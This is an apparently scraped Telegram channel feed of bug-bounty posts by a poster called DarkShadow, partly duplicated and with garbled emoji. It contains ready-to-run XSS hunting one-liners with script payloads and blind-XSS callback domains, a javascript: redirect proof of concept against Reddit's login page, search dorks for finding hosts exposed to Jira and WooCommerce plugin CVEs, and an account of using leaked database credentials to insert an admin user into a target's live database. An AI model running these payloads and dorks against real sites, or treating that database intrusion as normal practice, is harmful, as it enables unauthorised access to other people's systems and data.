Hey Hunter's,
DarkShadow here back again, dropping some one-liner killer XSS commands๐
Cleaned XSS Payload Hunting Commands:
1. Wayback + httpx + GF + Dalfox
2. Gospider + Dalfox
4. Gospider + Dalfox (Deep Crawl)
Required tools are:
If you find this helpful and want more cutting-edge tips and tricks, donโt forget to follow me ๐๐ผ DarkShadow
#bugbountytips #xss
DarkShadow here back again, dropping some one-liner killer XSS commands๐
Cleaned XSS Payload Hunting Commands:
1. Wayback + httpx + GF + Dalfox
cat domains.txt | httpx -silent -ports 80,443,8080,8443,3000,8000 | waybackurls | grep "=" | uro | gf xss | qsreplace '"><script>alert(1)</script>' | while read url; do curl -s "$url" | grep -q "<script>alert(1)</script>" && echo "[XSS] $url"; done
2. Gospider + Dalfox
gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -oP "https?://[^ ]+" | grep "=" | qsreplace -a | dalfox pipe3. Wayback + GF + Blind XSS via Dalfox
waybackurls target.com | gf xss | sed 's/=.*/=/' | sort -u | dalfox -b yoursubdomain.xss.ht pipe
4. Gospider + Dalfox (Deep Crawl)
gospider -S targets.txt -c 20 -d 3 --js --sitemap --robots | grep -oP "https?://[^\s']+" | grep "=" | uro | dalfox pipe -o gospider_xss.txt5. Dalfox Direct with Blind XSS
cat urls.txt | dalfox pipe -b yourdomain.xss
Required tools are:
httpx, waybackurls, uro, gf, qsreplace, curl, gospider, dalfox
If you find this helpful and want more cutting-edge tips and tricks, donโt forget to follow me ๐๐ผ DarkShadow
#bugbountytips #xss
X (formerly Twitter)
DarkShadow (@darkshadow2bd) on X
Ethical Hacker | Penetration Tester | Security Researcher | Bug Hunter | Exploit Developer.
๐ฅ~For more Join my New telegram Channel๐๐ผ https://t.co/9p1yvzluA4 โจ
๐ฅ~For more Join my New telegram Channel๐๐ผ https://t.co/9p1yvzluA4 โจ
๐ฅ13๐7๐5๐จโ๐ป3
Good morning hacker's,
Let's start morning to hack Reddit account ๐
Let's start morning to hack Reddit account ๐
๐11๐ซก2
Hey Hunters,
DarkShadow here, back again dropping an old-school Reddit XSS PoC for you to check out!
Letโs break it down and understand the logic behind the vulnerability.
Vulnerable Parameter: ?dest=
What does the dest parameter do?
The dest parameter is commonly used in login flows to redirect users after successful authentication. For example:
A user tries to access a protected page.
Reddit redirects them to:
/login/?dest=/protected/resource
After login, the site redirects them to the original dest URL.
Sounds fine, right? But hereโs the twist...
โ PoC Steps (Super Simple):
Boom๐ฅ. Thatโs it.
Just throw that URL and watch the magic happen. No need for complex encoding or obfuscation โ just a mindset shift.
keep your payloads sharp and your eyes sharper.
Donโt forget to react, share, and follow me in X
๐๐ผ DarkShadow
#bugbountytips #xss
DarkShadow here, back again dropping an old-school Reddit XSS PoC for you to check out!
Letโs break it down and understand the logic behind the vulnerability.
Vulnerable Parameter: ?dest=
What does the dest parameter do?
The dest parameter is commonly used in login flows to redirect users after successful authentication. For example:
A user tries to access a protected page.
Reddit redirects them to:
/login/?dest=/protected/resource
After login, the site redirects them to the original dest URL.
Sounds fine, right? But hereโs the twist...
โ PoC Steps (Super Simple):
https://www.reddit.com/login/?dest=javascript:alert(document.domain)
Boom๐ฅ. Thatโs it.
Just throw that URL and watch the magic happen. No need for complex encoding or obfuscation โ just a mindset shift.
keep your payloads sharp and your eyes sharper.
Donโt forget to react, share, and follow me in X
๐๐ผ DarkShadow
#bugbountytips #xss
๐18๐10๐ฅ7๐ฟ4โค2
Who are you in the world of cybersecurity?
Anonymous Poll
42%
Beginner โ currently learning cybersecurity ๐
25%
Bug bounty hunter โ actually reporting vulnerabilities ๐ฅ
7%
Red teamer โ simulating real-world attacks to improve defenses ๐ฅ
15%
Professional Pentester โ Working in a cybersecurity job role โจ
11%
Black hat hacker โ unauthorized hacking โ ๏ธ
๐ฅ11๐ณ8โค1๐1
Hey Hunter's,
DarkShadow here back again, dropping a killer trick ๐
Before testing file upload vulnerability, test the filename parameter.
Don't forget to show your love, and follow me ๐๐ผ DarkShadow
DarkShadow here back again, dropping a killer trick ๐
Before testing file upload vulnerability, test the filename parameter.
Don't forget to show your love, and follow me ๐๐ผ DarkShadow
๐ฅ22๐7โค3๐3๐ณ1๐จโ๐ป1๐ซก1
https://github.com/NazaninNazari/Origin_ReconPlease open Telegram to view this post
VIEW IN TELEGRAM
๐19๐ฅ10
Forwarded from Brut Security 2.0
Please open Telegram to view this post
VIEW IN TELEGRAM
๐ฅ10
CVE-2025-22157: Improper Access Control in Atlassian Jira, 7.2 ratingโ๏ธ
The vulnerability allows an authenticated attackers to escalate their privileges to administrator level or gain access to restricted workflows in Jira.
Search at Netlas.io:
๐ Link: https://nt.ls/lVuft
๐ Dork: http.meta:"content=\"JIRA\""
Vendor's advisory: https://confluence.atlassian.com/security/security-bulletin-may-20-2025-1561365992.html
The vulnerability allows an authenticated attackers to escalate their privileges to administrator level or gain access to restricted workflows in Jira.
Search at Netlas.io:
๐ Link: https://nt.ls/lVuft
๐ Dork: http.meta:"content=\"JIRA\""
Vendor's advisory: https://confluence.atlassian.com/security/security-bulletin-may-20-2025-1561365992.html
๐ฅ6๐2
The heavy recon features? Still cooking.
๐ addons.mozilla.org/addon/brutscope-extractor
Please open Telegram to view this post
VIEW IN TELEGRAM
โค24๐5
https://github.com/sw33tLie/uff
Please open Telegram to view this post
VIEW IN TELEGRAM
๐ฅ9๐3
Please open Telegram to view this post
VIEW IN TELEGRAM
๐ฅ22โค10๐5
Why there is no reactions๐ ?
Do let us know what content you guys looking for๐
Do let us know what content you guys looking for
Please open Telegram to view this post
VIEW IN TELEGRAM
โค34๐ข5๐3๐ค3๐1
๐ฅ Tried something new! Just dropped a quick guide on rooting Android Emulator + setting up Burp Suite for HTTPS interception.
โ Manual setup
โ Magisk + rootAVD
โ Trusted Burp cert
โ Meme vibes included ๐
๐ Read here: https://medium.com/p/how-to-root-your-android-emulator-hack-yourself-with-burp-suite-manually-like-a-legend-ef4fbe28ceab
โ Manual setup
โ Magisk + rootAVD
โ Trusted Burp cert
โ Meme vibes included ๐
๐ Read here: https://medium.com/p/how-to-root-your-android-emulator-hack-yourself-with-burp-suite-manually-like-a-legend-ef4fbe28ceab
1๐ฅ23โค8
Hey Hunters,
DarkShadow here back againโsorry for the delay, Iโve been a little sick. Please keep me in your prayers.
The story starts from a normal endpoint. When I clicked it, it redirected me somewhere else, and after resolving something, it returned the content. To check further whatโs going on, I opened the request in Burp Suite. The endpoint performed a 302 redirect to an external domain, which was out of scope.
But hereโs the twistโit was still showing the content from the original website I had requested. So I thought, maybe itโs working like a proxy?
Here comes the real mastery. Most bug hunters ignore this kind of behavior, but I decided to dig deeper. And yeah, I found a file: backup.zip
I instantly unzipped it and noticed a config/ folder, and inside itโa config.php file.
Guess what?
I found MySQL database credentials, and the most interesting part? The database URL was publicly accessibleโnot just localhost!
I tried connectingโฆ and boom! I was successfully connected.
But waitโthis domain is out of scope, right?
Thatโs what I thought tooโฆ until I started reading there massive database and was shockedโ
It was the target's database, exposed through their proxy server, which had the hardcoded credentials in the config file.
At that moment, I was really excited.
Then I thought: What if I create a new user with admin role?
So I did exactly thatโadded an admin user to the database.
Now, on the target website, thereโs a normal login page (not labeled as admin login), but I tried logging in with the new credentials and guess what?
BOOM! ๐ฅ
It logged me into the admin dashboard.
And just like that, I turned an out-of-scope target into a critical in-scope auth bypass vulnerability.โ
So guys, if you enjoyed this method, donโt forget to show some loveโand please, pray for me, Iโm really sick right now.
And donโt forget to follow me on X (Twitter): x.com/Darkshadow2bd
#bugbountytips #infosec
DarkShadow here back againโsorry for the delay, Iโve been a little sick. Please keep me in your prayers.
Anyway, just dropping a trick on how an out-of-scope target can lead to an in-scope critical vulnerability!
The story starts from a normal endpoint. When I clicked it, it redirected me somewhere else, and after resolving something, it returned the content. To check further whatโs going on, I opened the request in Burp Suite. The endpoint performed a 302 redirect to an external domain, which was out of scope.
But hereโs the twistโit was still showing the content from the original website I had requested. So I thought, maybe itโs working like a proxy?
Here comes the real mastery. Most bug hunters ignore this kind of behavior, but I decided to dig deeper. And yeah, I found a file: backup.zip
I instantly unzipped it and noticed a config/ folder, and inside itโa config.php file.
Guess what?
I found MySQL database credentials, and the most interesting part? The database URL was publicly accessibleโnot just localhost!
I tried connectingโฆ and boom! I was successfully connected.
But waitโthis domain is out of scope, right?
Thatโs what I thought tooโฆ until I started reading there massive database and was shockedโ
It was the target's database, exposed through their proxy server, which had the hardcoded credentials in the config file.
At that moment, I was really excited.
Then I thought: What if I create a new user with admin role?
So I did exactly thatโadded an admin user to the database.
Now, on the target website, thereโs a normal login page (not labeled as admin login), but I tried logging in with the new credentials and guess what?
BOOM! ๐ฅ
It logged me into the admin dashboard.
And just like that, I turned an out-of-scope target into a critical in-scope auth bypass vulnerability.โ
So guys, if you enjoyed this method, donโt forget to show some loveโand please, pray for me, Iโm really sick right now.
And donโt forget to follow me on X (Twitter): x.com/Darkshadow2bd
#bugbountytips #infosec
๐20โค10๐5๐ฑ4
http://powerade.com.s3.amazonaws.com/index.html
guy's let's see whos explaination is better!
what is the impact after takeover a in-scop target S3 bucket?๐ค
guy's let's see whos explaination is better!
what is the impact after takeover a in-scop target S3 bucket?๐ค
๐11๐ฅ5โค1๐ฟ1
Hey Hunter's,
DarkShadow here back again...
Dropping a new POC in WordPress plugin arbitrary administrator role user creation to broken authentication lead.
Before, don't forget to share and show your love guy's.
For more follow me on my X ๐๐ผ DarkShadow
DarkShadow here back again...
Dropping a new POC in WordPress plugin arbitrary administrator role user creation to broken authentication lead.
Before, don't forget to share and show your love guy's.
For more follow me on my X ๐๐ผ DarkShadow
โค24๐4๐3
Follow the Brut Security channel on WhatsApp: https://whatsapp.com/channel/0029VacUEmpCnA8014ZLnm1L
WhatsApp.com
Brut Security | WhatsApp Channel
Brut Security WhatsApp Channel. We offer Cyber Security Training, Penetration Testing Services and Bug Bounty Tips to protect businesses and individuals from cyber attacks. Feel Free to DM๐ก๏ธ. 59 followers
๐ฅ4
CVE-2025-47577: Unrestricted Upload of File with Dangerous Type in TI WooCommerce Wishlist Plugin, 10.0 rating ๐ฅ๐ฅ๐ฅ
Failure to check the types of uploaded files allows attackers to upload a web shell to the server and perform RCE.
Search at Netlas.io:
๐ Link: https://nt.ls/jYyss
๐ Dork: http.body:"plugins/ti-woocommerce-wishlist"
Read more: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ti-woocommerce-wishlist/ti-woocommerce-wishlist-292-unauthenticated-arbitrary-file-upload
Failure to check the types of uploaded files allows attackers to upload a web shell to the server and perform RCE.
Search at Netlas.io:
๐ Link: https://nt.ls/jYyss
๐ Dork: http.body:"plugins/ti-woocommerce-wishlist"
Read more: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ti-woocommerce-wishlist/ti-woocommerce-wishlist-292-unauthenticated-arbitrary-file-upload
๐ฑ8โค4๐2